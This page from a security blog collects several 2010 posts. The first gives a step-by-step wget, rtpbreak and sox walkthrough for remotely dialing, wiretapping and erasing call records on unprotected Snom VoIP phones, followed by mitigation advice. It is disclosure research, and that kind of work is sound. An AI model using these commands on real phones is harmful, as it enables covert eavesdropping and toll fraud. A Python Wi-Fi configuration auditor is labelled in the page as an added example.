Infosec Island

It's a Feature - Remote Tapping a Snom VoIP Phone

Tue, 09/07/2010 - 20:00

I have a bit of history in attacking VoIP phones, specifically VoIP Wifi phones. Way back in 2005-2006 I purchased several VoIP Wifi phones and conducted very basic security analysis to demonstrate a commonality of vulnerabilities, most notably that many of them had a number of open ports and extraneous services.

This research resulted in several CVEs, including some for companies that should have known better. I also spoke at a few conferences, and you can check out my Shmoocon slides from 2006.

Most importantly of all, my findings on the VxWorks debugging port, UDP/17185, were recently expanded upon in depth by none other than HD Moore, who released research and a set of tools that are truly awe-inspiring when it comes to attacking the VxWorks debugger.

For myself, it was humbling to see HD take this to a level that I can only dream of someday attaining.

So, last week, Michael Sutton at Zscaler wrote a blog post about misusing a new feature in HP printers called WebScan. Essentially, the WebScan functionality allows a user to scan a document that is physically on the printer and save the image to the local computer.

HP's WebScan is an excellent example of how a device's features are all too often leveraged by attackers, and Michael's post inspired me to look at some recent features ripe for abuse in VoIP phones.

One area that I wanted to revisit is attackers being able to control a VoIP phone's dialing. Back in 2006 I identified a feature in Clipcomm VoIP Wifi phones that would allow an attacker to log into the phone via telnet and place a call from the VoIP Wifi phone to any number. Pretty bad stuff, right?

Looking at some of the newer VoIP phones from Snom, however, there's a webpage on the Snom's webserver that allows one to enter a number to dial. A useful feature, so long as your Snom has authentication set on the webserver; otherwise anyone with access to that webpage can make a call. From the Snom user's perspective, this feature will start a call from your Snom on the speakerphone.

So, with this kind of feature, an attacker could search for Snom phones exposed on the Internet, determine whether they are using HTTP authentication, and if they are not, could easily connect to the Snom VoIP phone's webserver and punch in the number to dial -- clearly opening up avenues to cause grief such as expensive 900 numbers, prank calls, etc.

Really, this is not a big deal, and is more of a headache than anything else. But what if an attacker could remotely capture on the phone the voice streams from a call that she placed? That ups the ante a bit, and such an attack is possible by abusing features!

Snom VoIP Phone PCAP Trace

Some Snom VoIP phones have a feature called "PCAP Trace" that allows, via the web interface, the start/stop and download of a PCAP file on the Snom VoIP phone -- the screenshot below shows the actual page on the VoIP phone, a Snom 360 in this case.

The Snom PCAP Trace feature does have limitations: the PCAP data is stored in a circular buffer because of memory limitations, and enabling PCAP capture can impact the phone's performance (no surprise here). Still, it is a scary feature that, if not secured, creates an attack vector where a remote attacker can literally tap your phone.

Remote Tapping Your Snom VoIP Phone

To start/stop a PCAP on the Snom VoIP phone, one just clicks on the 'Start' or 'Stop' buttons on the phone webpage. After the capture is complete, an attacker can then download the PCAP trace and extract the audio using Wireshark or the amazing command-line RTPbreak by Michele Dallachiesa.

So, combining the web page place call feature with the PCAP trace feature, an attacker can make a Snom VoIP phone call any number and then the attacker can capture the call remotely on the Snom VoIP phone.

For the final touch, an attacker can also delete the call record of the last call made, thereby wiping the apparent record of the call, at least on the Snom VoIP phone itself. Scary? You betcha. The following is a walk-through of the seven steps -- you can code this up for yourself or download my handy-dandy snom_call_tap.sh script -- please do be ethical and responsible with this script.

Poor Man's NSA -- Step-by-Step

In the commands below, $1 is the address of the Snom phone and $2 is the number to dial; output from each step is saved under a logz_$1 directory.

Step 1: Start the tap on the Snom Web interface

    wget --post-data='start_pcap=Start' $1/pcap.htm -O logz_$1/start_pcap.html

Step 2: Place the call to the target through the Snom Web interface

    wget --post-data='NUMBER='$2'&DIAL=Dial&active_line=1' $1 -O logz_$1/place_call.html

Step 3: Stop the tap on the Snom Web interface

    wget --post-data='stop_pcap=Stop' $1/pcap.htm -O logz_$1/stop_pcap.html

Step 4: Pull the PCAP from the Snom Web interface

    wget http://$1/trace.pcap -O logz_$1/trace_$1.pcap

Step 5: Run RTPbreak to extract the RTP stream from the PCAP

    rtpbreak -P2 -t100 -T100 -d logz_$1 -r logz_$1/trace_$1.pcap

Step 6: Run SoX to marry the extracted audio into a single WAV file

    sox -r8000 -c1 -t ul logz_$1/rtp.0.0.raw -t wav logz_$1/0.wav

Step 7: Delete the last call record to cover tracks

    wget http://$1/adr.htm?dialeddel=1 -O logz_$1/del_call_log.htm

So, there you have it. Two things make this kind of feature especially problematic. First, known vulnerabilities in some Snom phones allow an attacker to bypass authentication.

Second, Shodan, which I've written about before here and here, makes it easy for attackers to locate vulnerable Snom phones. I leave following-up on these aspects an exercise for the reader.

Mitigation

Don't like the possibility of some miscreant controlling your Snom VoIP phone, making calls on your behalf and tapping your calls? I expect that you don't. Here are some humble suggestions to help you to mitigate your risk.

  • Avoid putting VoIP phones on public IP addresses if at all possible
  • Use the latest code for VoIP phones that patches known vulnerabilities
  • Enable authentication on the VoIP phone's Web interface and use a strong password
  • Send logs from the phone to another server and review them for abuse
  • Train phone users to recognize that their VoIP phone is compromised (slow running, makes calls by itself, etc.)
  • Demand from vendors firmware images that do not have such dangerous functionality -- or at least require more authentication to use this kind of "feature"
  • Support alternatives like the Open Snom Project

Categories: Security

Filling the Infosec Talent Gap in the United States

Tue, 09/07/2010 - 19:50

In reading a recent article published at PRWire I am reminded of an article I read in 2002 that demonstrated how the dot com bust would have significant implications in about 4-8 years.

The premise was that with no Americans actively seeking college education in information systems, there would be a significant gap in our indigenous talent pool.

While the exercises demonstrated in the above article are great, it is important to note that the NSA and DHS have jointly funded what is essentially an R.O.T.C. program.

The problem exists where the graduates are pretty much all farmed out to DoD and in limited instances DHS. So what about CIP in the private sector? Not just power plants but also state government and first responder communication infrastructures?

These organizations still go insufficiently protected by technology and even if they have the right tech, who do they have to adequately handle the operational and managerial aspects of security?

A question I have for the group is this: "IF" a scenario existed whereby you (a CIP) were a US Citizen, cleared, certified, and possessed solid credentials and could be hired for $50-65K a year, would it be worth it for the same CIP organization to subsidize a government kitty-pot for say $15K a year?

Think about what you get on the backend and for what investment. I am eager to learn more about the audience's thoughts on such a premise.

Thanks,

Carter Schoenberg, CISSP

Categories: Security

Finding a Trusted Path in Un-Trusted Computers

Tue, 09/07/2010 - 18:00

In my previous blog on Malware-resilient Software-as-a-Service Strong Authentication the issue of trust was raised. The current blog quotes the publication Extending the Trusted Path in Client-Server Interaction by Hanno Langweg and Tommy Kristiansen.

Interacting with the local human user is the weak point in client-server communications. While machines can employ cryptographic mechanisms to ensure authenticity, integrity, and confidentiality of communication, humans are not capable of this. They rely on their local computer to present data and transmit their input to a server reliably.

Today’s operating systems provide protection against unauthorized modification of operating system components and offer mechanisms like discretionary access control and process separation to users and processes. Often, all processes of the same user operate with the same privileges. 

Malicious software (malware) can exploit this fact to read input destined for other processes (e.g. a key-logger) or modify the output displayed to the user (e.g. a local phishing attack). A server application needs a trusted path to the user at a network node.

This concept is not new and exists in operating systems. The secure attention sequence Ctrl+Alt+Del in Microsoft Windows is an example of how the user can invoke a trusted path to the operating system to log on.

Output of a trusted path cannot be manipulated by other processes and input cannot be read. The process using a trusted path can be sure that input and output are shared only with the user.

Trusted Path definition: A mechanism by which a person at a terminal can communicate directly with the Trusted Computing Base. This mechanism can only be activated by the person or the Trusted Computing Base and cannot be imitated by untrusted software.

In the Microsoft Windows operating system, applications typically receive information about user actions by messages. Since these can be sent by malicious programs as well, they are a convenient attack vector. It is a vulnerability by design: Windows treats all processes that run on the same desktop equally.

If one needs an undisturbed interface, a separate desktop attached to the interactive window station should be assigned. However, managing separate desktops can be cumbersome for software developers.

So most of today’s software that interacts with a local user runs in a single desktop shared by benign and malign programs. A number of applications today are structured after the client-server pattern: internet banking, contract signing, e.g. in e-government, or online voting.

Here, the main application is run on highly protected servers. Users connect to the server from their local machine. The machine acts as a smart terminal, collecting user input, transmitting it to the server, receiving server data and displaying server output.

The local user initiates and completes transactions with the server application. The user interacts with a local application via the local user interface. Some problems immediately arise:

1. How do user and application know which server they are talking to?

2. How does the server know which application it is talking to?

3. How does the user know which application input is directed to?

4. How does the user know which application produces the output?

5. How does the application know that user received the output?

6. How does the application know where input comes from?

The first two problems can be solved by using a cryptographic protocol that offers secure authentication of the communicating parties and integrity of the communication, e.g. SSL.

The strength of the cryptographic algorithm relies on access of the adversary to encrypted data and on it being computationally infeasible to decrypt the data or forge a digital signature.

The remaining four questions demand a trusted path between the local application and the user. The local user interface is the weak link in the interaction of the user with the server application.

An adversary is much more likely to attack here than spending resources on breaking a cryptographic algorithm – breaking cryptography is typically either a formidable mathematical challenge or requires a large amount of computing resources.

Attacks on the server are another option. However, a server is usually easier to protect than a large number of clients.

It may be possible to distinguish users and untrustworthy programs by observing their input behavior…

Our approach:

Our approach to finding a trusted path does not rely on particular PC architectural strengths or weaknesses but rather on basic limitations of malware.

Limitation 1: Physically speaking to the PC microphone is impossible for any program residing on the same PC.

Therefore client authentication software that requires the user to actually speak into the PC microphone will be able to establish a trusted path to the authentication server.

On the other hand, malware residing on the same computer will not be able to complete the authentication, even though it has collected all the necessary digital information through key-loggers, etc.

Fig. 1: Malware is incapable of speaking to the PC microphone.

Limitation 2: Manipulating displayed data by one program is detectable by another program.

Protecting the integrity of the information displayed to the user from being manipulated by malware is another issue. In this case the malware does not care much about attacking the authentication mechanism; all it cares about is manipulating the display.

If all processes share the same display, then it is possible to detect the discrepancy between the data presented to the user for his/her confirmation and the data being actually digitally signed.

Here again we are taking the physical path – malware can manipulate display, but this manipulation can be detected.

Fig. 2: Malware is capable of manipulating the display, but incapable of stealing the transaction.

Categories: Security

Using ISO 9001 For Implementing ISO 27001

Tue, 09/07/2010 - 17:00

You have already implemented ISO 9001? You have heard that ISO 27001 might be a good idea? But how can something that has to do with quality help you implement information security?

It can, more than you may think. ISO 9001 specifies how the quality management systems (QMS) must look, while ISO/IEC 27001 specifies the information security management systems (ISMS). Therefore, the "management systems" part is the same - so what is it actually?

The philosophy of management systems has grown from the theory developed by W. Edwards Deming during the second half of the 20th century, and is based on the Plan-Do-Check-Act cycle.

Basically, this cycle consists of the following: in the Plan phase you have to plan what you want to achieve with the management system, in the Do phase you implement it, in the Check phase you constantly monitor whether you have achieved what you planned, and in the Act phase you make improvements, i.e. fill the gap between what you have planned and what you have achieved.

Although this cycle was invented with quality management in mind, it was established as a foundation for all other management systems - information security (ISO/IEC 27001), environment (ISO 14001), business continuity (BS 25999-2), etc.

It means that some of the elements you have implemented for the quality management system according to ISO 9001 you can use for the information security management system as well - here is the list:

  • Document management - the procedure used for document management in QMS can be used for the same purpose in ISMS, with only minor adjustments
  • Internal audit - the same procedure can be used for both QMS and ISMS, although the internal audit itself would usually be done by different people since it is not very likely that one person would have deep enough knowledge of both information security and quality
  • Corrective and preventive actions - the procedure used for QMS can be used for the same purpose in ISMS, although it is likely that different persons will be solving issues related to QMS or ISMS
  • Human resources management - the same cycle of HR planning, training and evaluation is used for both management systems; naturally, the difference is in the profile of needed skills and knowledge
  • Management review - the principles for management review are the same for both management systems; although it would not be recommendable to perform both reviews in parallel, management will already be accustomed to making decisions in QMS, so they will have better understanding of how to make decisions in the context of ISMS
  • Setting the business goals and tracking whether they have been achieved - the same mechanism is laid down in both standards, so management will be used to such systematic planning

Therefore, if you have already implemented ISO 9001, you will have an easier job implementing ISO 27001 (and vice versa) - you could save up to 30% of time. Further, you will have cheaper certification audits since certification bodies are offering the so called "integrated audits", which means they will do both ISO 9001 and ISO 27001 in the same audit, charging you a smaller fee compared to separated audits.

If your QMS is functioning well, you will find your ISMS project developing rather smoothly - management will have better understanding of potential business benefits, while all organizational units will be accustomed to the necessity of defining precise procedures, responsibilities and documentation.

Having a QMS indeed provides very good foundation for information security - if you already have ISO 9001, do give a serious thought to ISO 27001.

Cross posted from ISO 27001 & BS 25999 blog - http://blog.iso27001standard.com

Categories: Security

A Delicate Balance: DLP and Privacy

Tue, 09/07/2010 - 08:20

Article by Tamir Elchayani, Technical Training Engineer

Data Leakage Prevention (DLP) practices are implemented in order to prevent the unauthorized distribution of confidential/private information. Because email was not originally developed with security as a top priority, the transfer of sensitive information is immediately exposed to a range of threats.

The limitations of the SMTP protocol, industrial espionage, disgruntled employees and the growing frequency of identity theft represent only a fraction of the threats to an organization’s emails.

While these threats are real and must be addressed, it is crucial that a DLP system and policy be consistent with a company’s overall strategy so that employee expectations about privacy can be reasonably managed.

Sensitive information is typically characterized by keywords, textual or numerical patterns (e.g. credit card number, social security number, etc.) and other content-related phrases. PineApp's policy-driven DLP module, for instance, scans all outgoing emails for the presence of content that has been defined by an organization's own policy.

An email that is flagged, due to these predefined criteria, is immediately intercepted and system administrators are instantly notified.

While it may be obvious to company management that all emails ought to be reviewed and scanned for security purposes, a company must make it clear to their employees that someone is NOT reading every email in their system.

This “Big Brother” perception must be acknowledged and addressed from the very beginning stages of a DLP policy development.

When applying DLP to an organization’s email server, IT managers need to maintain a delicate balance between their company’s security interests and the end-user’s privacy. This balance is only possible through a coherent policy that is aligned with the management of sensitive data in all facets of the organization.

Cross-posted from PineApp

Categories: Security

CYBERCOM and Intelligence Community Jobs

Tue, 09/07/2010 - 08:10

With the recent (May 21, 2010) formation of the Cyber Command (CYBERCOM), the Department of Defense will manage the war on Cyber Terrorism under unified leadership. Domestic Cyber efforts will remain under the Department of Homeland Security (DHS).

An important step in the new CYBERCOM organization is the inclusion of the Cyber assets and capabilities of the Defense Information Systems Agency, which will also move to the Ft. Meade, Maryland campus where the National Security Agency is headquartered.

The creation of CYBERCOM is a leap forward in the war on International Cyber Terrorism, and the challenges are huge. The new CYBERCOM, as a military and intelligence organization, should approach the issue of Cyber Terrorism as a military campaign rather than a criminal action. Offensive Cyber operations and counter strikes will be approached with military precision like any other military campaign.

CYBERCOM is expected to be operational by the end of 2010. This is not soon enough for many observers.

Our Competitors and Potential Adversaries are Significantly Ahead of the United States

Russia and China have a decidedly different attitude toward Cyber Security and attacks.

For a number of reasons, but primarily the refusal by the United States to view International Cyber Terrorism as a military threat, the United States has failed to keep pace with international Cyber Terrorism. And, because of our total dependence on data networking, the U.S. is at greater risk than our competitors.

Many informed sources believe that we are in a Cyber war already and we are losing.

No country in the world is more dependent on its computers than the United States. Data networks now underlie the U.S. power grid, its military operations and the telecommunications, banking and transportation systems. That means the U.S. is uniquely vulnerable to sophisticated computer hackers.

This is not a theoretical problem. In the Department of Defense’s most recent Quadrennial Defense Review, cyber attacks in the military sector have averaged over 5,000 per day for the last two years.

During the first half of 2009, there were reported at least 43,785 incidents of malicious cyber activity directed against the U.S. Department of Defense. These incursions came from a variety of sources, ranging from criminal hackers to foreign governments, and remediation alone cost the Defense Department more than $100 million. That figure does not account for the significant cost of data lost to cyber espionage.

And the source of the attacks has raised troubling questions. China has been identified as a suspect, including in denial of service attacks on the networks that affect troop deployments and logistics in crisis areas, as well as Cyber incursions at the Pentagon, U.S. military bases throughout the world, and the power grid that supplies 90% of the requirements for the Department of Defense.

Cyber-security specialists say Russia and China rely on proxy groups to conduct attacks on enemies, as Russia allegedly did in 2008 against Georgia. China and Russia deny such accusations.

Russia realizes the threat. Senior Russian analysts draw a parallel between nuclear and cyber weapons, because cyber weapons can affect a huge number of people, as nuclear weapons can. The main difference between nuclear and cyber weapons, the Russians believe, is that Cyber weapons are very cheap, easy to use and almost free of charge.

Russia wants to forge a kind of cyber arms-control agreement, but, in the past, the United States was primarily interested in forging formal agreements to fight cybercrime. CYBERCOM however, in a major change of policy is urging now for a Cyber weapons control treaty. This first step is a major positive development.

CYBERCOM and Cyber Jobs

During the formative stages of CYBERCOM, new contracting job opportunities will be small with the military services and other clients procuring the lion’s share of new services. But the wartime approach of CYBERCOM will require significantly more Cyber professionals as that realized threat grows and is addressed.

In addition, the formation of CYBERCOM may open a pathway for service contracting opportunities at the National Security Agency (NSA), where higher level security clearances are required. With the move of DISA (Defense Information Systems Agency) to the Ft. Meade campus, contractor access and the security clearance process are better facilitated.

Contractors can hire and place qualified Cyber personnel at DISA and provide services concurrent with obtaining higher level clearances. This opens the window for Cyber professionals to access the Intelligence Community without the burden of holding employees on overhead.

Since 2003 Aspiration Software LLC has provided Cyber Security services to the Intelligence Community and the Department of Defense.

Categories: Security

Algerian Hackers Target Israeli Teddy Bear Picnic

Tue, 09/07/2010 - 08:00

In one of the funniest cases of website mis-identification to date, recent visitors to the Belvoir Castle website unexpectedly found a black page displaying the Algerian flag and the following Arabic text:

"The cause of this hack is Israel's presence. Internet law does not protect the ignorant. Thank you to all the pirates of Algeria."

So what were the occupants of Belvoir Castle doing that drew the Algerian hackers' attention?

Well... They were having a teddy bear picnic!

And these weren't your average, run of the mill Israeli Commando teddies either. They were just your regular, everyday, plush, fluffy, adorable little teddy bears.

Belvoir Castle, the former home of the Dukes of Rutland, is a beautiful castle in the Leicestershire countryside. It is now open to the public and they have weddings, costumed guided tours and apparently, clandestine Israeli Teddy Bear briefings.

Though some say that the Algerians had mistaken Belvoir Castle with Belvoir Fortress, the former crusader castle in Israel, I am not so sure. One look at those coal black teddy bear eyes and you just know that they are highly trained warriors. But if they are right, the Algerian hackers were off target by, oh about 2000 miles...

Pretty funny stuff.

In other news, Iran mysteriously adds all Teddy Bears to their "No Fly list".

Cross Posted from CyberArms

Categories: Security

Organized Web Mobsters Getting Jobs Inside

Mon, 09/06/2010 - 08:10

In 2009, there were a reported 140 million records compromised, compared to 360 million in 2008. In 2010 there have been almost 13 million records stolen. But don’t have a party just yet.

Criminals are fine-tuning their craft and getting better. The industry just isn’t making it as easy. 97% of those records were stolen using malware – malicious software designed to attack the target’s existing systems and software in place.

A reported 50% of the malware was installed remotely. Almost 20% came from visiting infected websites and almost 10% was installed when employees clicked infected links that conned or “socially engineered” them.

A recent Verizon report stated, “Over the last two years, custom-created code was more prevalent and far more damaging than lesser forms of customization, the attackers seem to be improving in all areas: getting it on the system, making it do what they want, remaining undetected, continually adapting and evolving, and scoring big for all the above.”

This may be also attributed to an inside job. A rogue employee on the inside always has the advantage of knowing exactly how to remain undetected.

The report further stated that organized crime rings may “recruit, or even place, insiders in a position to embezzle or skim monetary assets and data, usually in return for some cut of the score, the smaller end of these schemes often target cashiers at retail and hospitality establishments while the upper end are more prone to involve bank employees and the like.”

In the past three years that’s a total of 513 million records. On average, every citizen has had his or her data compromised almost twice. Where’s your Social Security number in that mix?

To ensure peace of mind, subscribe to an identity theft protection service, such as McAfee Identity Protection, which offers proactive identity surveillance, lost wallet protection, and alerts when suspicious activity is detected on your accounts. For additional tips, please visit http://www.counteridentitytheft.com

Robert Siciliano is a McAfee consultant and identity theft expert. See him discuss another data breach on Fox News. (Disclosures)

Categories: Security

Dr. InfoSec's Quotes of the Week (009)

Mon, 09/06/2010 - 08:00

Altering the Economics of Cybersecurity

"Economic incentives currently favor the attackers - attacks are easy, cheap, you can steal billions and your chances of getting caught are slim. If we can increase the cost to the attackers and increase the profitability of good cyber defense we can create a sustainable system..." -- Larry Clinton, Internet Security Alliance President and CEO

McAfee on APTs

"If they don’t know what it is, it’s an APT. While the attacks aren’t new — they have happened in the government world for a long time — the realization of what is going on is new. It can be difficult for an organization to sort out whether it is just a zero-day malware or if the organization is being specifically targeted. In the conventional world, if somebody launches a missile, you can pretty much understand what the intent is and you can attribute it. In the cyber world, if someone launches an attack, you might not be sure who is behind it and you don’t know what the intent is. In the military world, they make a distinction between information gathering and an actual attack..."  -- George Kurtz, worldwide CTO for McAfee

Microsoft on Privacy

"Every piece of data on the Internet maps back to who created it and who they know. Where they were when they did it, where they've been and where they plan to go. What they are interested in, attend to, and interact with, and is around them, and when they do these things. The contextualization of the web in the world and the connection of the world to the web, mediated by the connections of people to each other, is forming a new Internet which has vast implications of privacy, identity, and innovation; and how we are going to structure our societies and our economies..." -- Marc Davis, Partner Architect at Microsoft Online Services Division

Lynn on National Cyber Strategy

“The principal elements of that strategy are to develop an organizational construct for training, equipping, and commanding cyberdefense forces; to employ layered protections with a strong core of active defenses; to use military capabilities to support other departments' efforts to secure the networks that run the United States' critical infrastructure; to build collective defenses with U.S. allies; and to invest in the rapid development of additional cyberdefense capabilities. The goal of this strategy is to make cyberspace safe so that its revolutionary innovations can enhance both the United States' national security and its economic security...” -- William Lynn, the US Deputy Secretary of Defense

Cross-posted from Dr. Infosec

Categories: Security

Good Reasons to Lock Down Your Wireless Network

Sun, 09/05/2010 - 08:10

Do you have a wireless router? Is it appropriately configured to be secure? Why bother? I've three reasons.

  • War Driving -- Google's revelation that it inadvertently collected publicly broadcast SSIDs (the Wi-Fi network name) and MAC addresses (device identifiers) while gathering its Street View data should serve as a reminder to tighten up our router security. Remember, anyone driving or sitting in proximity to your business, home or office may be within the exploitable footprint of your Wi-Fi signal. Once within your router's footprint they too can collect your SSID and MAC addresses, and if your network is not secured, their odds of collecting the information traversing the connection increase exponentially.
  • Liability -- A German court recently fined the owner of a wireless router for failing to secure the device appropriately, which allowed a third party to connect to the internet through it and engage in illegal downloading. The court in Karlsruhe, Germany noted: "Private users are obligated to check whether their wireless connection is adequately secured to the danger of unauthorized third parties abusing it to commit copyright violation." The court noted that the owner could be fined up to 100 Euros. Regardless of the laws in your area, legal problems are only one of many reasons to ensure your router is secure.
  • Mistaken Identity -- As noted in the prior point, a third party used the unencumbered access to an individual's router to perpetrate a crime. Think of how crime-solvers walk their data back: they trace the Internet Protocol address. If that IP address ends at your router, it is not an unreasonable conclusion that the perpetrator is someone within your home, office or business. Think about the physical inconvenience of being taken down to the local precinct to sort things out, the property seizures and the prospects of recovering what was seized. While you will no doubt be able to explain your way out of the situation, as did the owner of the router in Germany, why put yourself in this position?

If you see your neighbor's Wi-Fi in an unsecured state (e.g., open access), let them know. Don't assume the owner configured the device; perhaps it was a more technically savvy neighborhood high school student or a for-hire network installer, who in either case failed to put a WPA2 password in place.

In Queensland, Australia the police are identifying unprotected Wi-Fi during their routine patrols and notifying their owners in an effort to protect unwary citizens from their own unprotected routers. This is something suitable for neighborhood watch organizations.

Use a strong password of 8-14 characters which isn't a word and includes non-predictable symbols; (B$@iJH91$(~(K is an example of the kind of value intended. If your router is using WEP encryption and not WPA2, think about upgrading that router of yours.

You may also consider limiting access to your network to MAC addresses you own or know. Don't forget to set up separate guest connectivity to leave a clear audit trail distinguishing between your use and guest users whom you have no control over.

This could be especially important for the small business owner whose network may be used by an unscrupulous individual.
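
The hardening advice above, turned into a check a practitioner could run against an access-point configuration. This is an added example and not code from the original post: it parses a hostapd-style configuration, flags WEP or open access, applies the post's passphrase rules (8-character minimum, symbols, digits, not a plain word; no upper cap is enforced because WPA2-PSK accepts up to 63 characters), notes whether a MAC-address allow-list is enabled on the primary network, and confirms that a separate guest SSID exists. Both configuration texts are constructed for illustration; the key names (wpa, wpa_key_mgmt, rsn_pairwise, wpa_passphrase, macaddr_acl, bss) follow hostapd.conf conventions, and the tiny common-word list is a stand-in for a real dictionary.

```python
import string

# Constructed sample: a router left with WEP, no MAC filtering and no guest network.
WEAK_CONF = """\
interface=wlan0
ssid=HomeNet
wep_default_key=0
wep_key0=ABCDE
macaddr_acl=0
"""

# Constructed sample: the same router after applying the advice in the post.
HARDENED_CONF = """\
interface=wlan0
ssid=HomeNet
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=(B$@iJH91$(~(K
macaddr_acl=1
accept_mac_file=/etc/hostapd/allowed.macs

# second BSS: guest SSID with its own passphrase, kept apart from the home network
bss=wlan0_1
ssid=HomeNet-Guest
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=Guest!Pass#2010
"""

SYMBOLS = set(string.punctuation)
# Stand-in for a real dictionary: constructed and deliberately tiny.
COMMON_WORDS = {"password", "homenet", "wireless", "internet", "admin"}


def parse_hostapd(text):
    """Split hostapd.conf text into one dict per BSS; the primary BSS comes first."""
    sections = [{}]
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition("=")
        key, value = key.strip(), value.strip()
        if key == "bss":          # every bss= line opens a new virtual AP
            sections.append({})
        sections[-1][key] = value
    return sections


def passphrase_findings(pw):
    """Apply the post's passphrase rules: length, symbols, digits, not a plain word."""
    issues = []
    if len(pw) < 8:               # WPA2-PSK minimum; the post suggests 8-14 characters
        issues.append("passphrase shorter than 8 characters")
    if not any(c in SYMBOLS for c in pw):
        issues.append("passphrase has no symbol characters")
    if not any(c.isdigit() for c in pw):
        issues.append("passphrase has no digits")
    core = pw.lower().strip(string.punctuation + string.digits)
    if core in COMMON_WORDS:
        issues.append("passphrase is a common word")
    return issues


def audit_bss(bss, primary=True):
    """Findings for one BSS. MAC filtering is only expected on the primary network."""
    ssid = bss.get("ssid", "<no ssid>")
    findings = []
    if "wep_key0" in bss or "wep_default_key" in bss:
        findings.append(f"{ssid}: WEP in use; upgrade to WPA2")
    elif bss.get("wpa") not in ("2", "3"):   # wpa=2 is WPA2 (RSN); wpa=3 is mixed WPA+WPA2
        findings.append(f"{ssid}: open or WPA1-only; enable WPA2")
    else:
        if bss.get("wpa") == "3":
            findings.append(f"{ssid}: mixed mode still accepts WPA1 clients")
        if "CCMP" not in bss.get("rsn_pairwise", ""):
            findings.append(f"{ssid}: WPA2 without CCMP (AES) pairwise cipher")
        for issue in passphrase_findings(bss.get("wpa_passphrase", "")):
            findings.append(f"{ssid}: {issue}")
    if primary and bss.get("macaddr_acl") != "1":
        findings.append(f"{ssid}: MAC-address allow-list not enabled (optional hardening)")
    return findings


def audit_config(text):
    """Audit every BSS and require a separate guest SSID, as the post recommends."""
    sections = parse_hostapd(text)
    findings = []
    for index, bss in enumerate(sections):
        findings.extend(audit_bss(bss, primary=(index == 0)))
    if len(sections) < 2:
        findings.append("no separate guest SSID configured; guest traffic shares your audit trail")
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"{name}: {audit_config(conf) or ['no findings']}")
```

Running the script reports three findings for the weak configuration (WEP, no MAC allow-list, no guest SSID) and none for the hardened one. The MAC allow-list result is reported as optional hardening rather than a failure, matching the post's "you may also consider" wording; MAC addresses are broadcast in the clear, so the allow-list narrows exposure but is not a substitute for WPA2.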

Cross-posted from Christopher Burgess, Huffington Post

Category: Security

SaaS - The Value is in the Vertical

Sun, 09/05/2010 - 08:00

I’ve long contended that SaaS applications give the ability to build very specific vertical applications that tie together several different functional areas to really meet the needs of a particular class of business.

Cloud applications, with their general adoption of APIs and the resulting ease of integration with other apps, make this "quasi suite" approach viable. Intacct today announced an example of this in action.

Intacct, the SaaS accounting vendor, has partnered with Avectra, a company that provides software tools for member-based organizations. The integration combines Avectra's association management system, a tool to manage member information, contact details and event information, with Intacct's accounting functionality.

The aim is to give member-based organizations a management tool that provides end-to-end control within their organization.

Specific benefits that this sort of integration can bring include:

  • Greater Automation: Having the ability to automate workflows can save time and reduce errors within an organization.
  • Increased Productivity: Re-keying data makes no sense; integrated systems remove the need for it.
  • Automated Billing and Revenue Recognition: Integrating customer-facing systems with the accounting systems helps with the cashflow of the organization.
  • Real Time Business Visibility: Again, integrating the customer-facing and accounting parts of the business allows for meaningful dashboards and information.

While the particular details of this integration are likely to only be interesting to people with an involvement in a member-based organization, it is a great example of two distinct applications doing the heavy lifting and producing a highly tailored combined application.

Chris Anderson’s oft-quoted “long tail” theory discussed the niche strategy of selling a large number of unique items in relatively small quantities. Cloud computing is the enabler that will allow vendors to meet the needs of long tail end users, more quickly, more easily, and more successfully than in a disconnected world.

Cross-posted from Diversity

Category: Security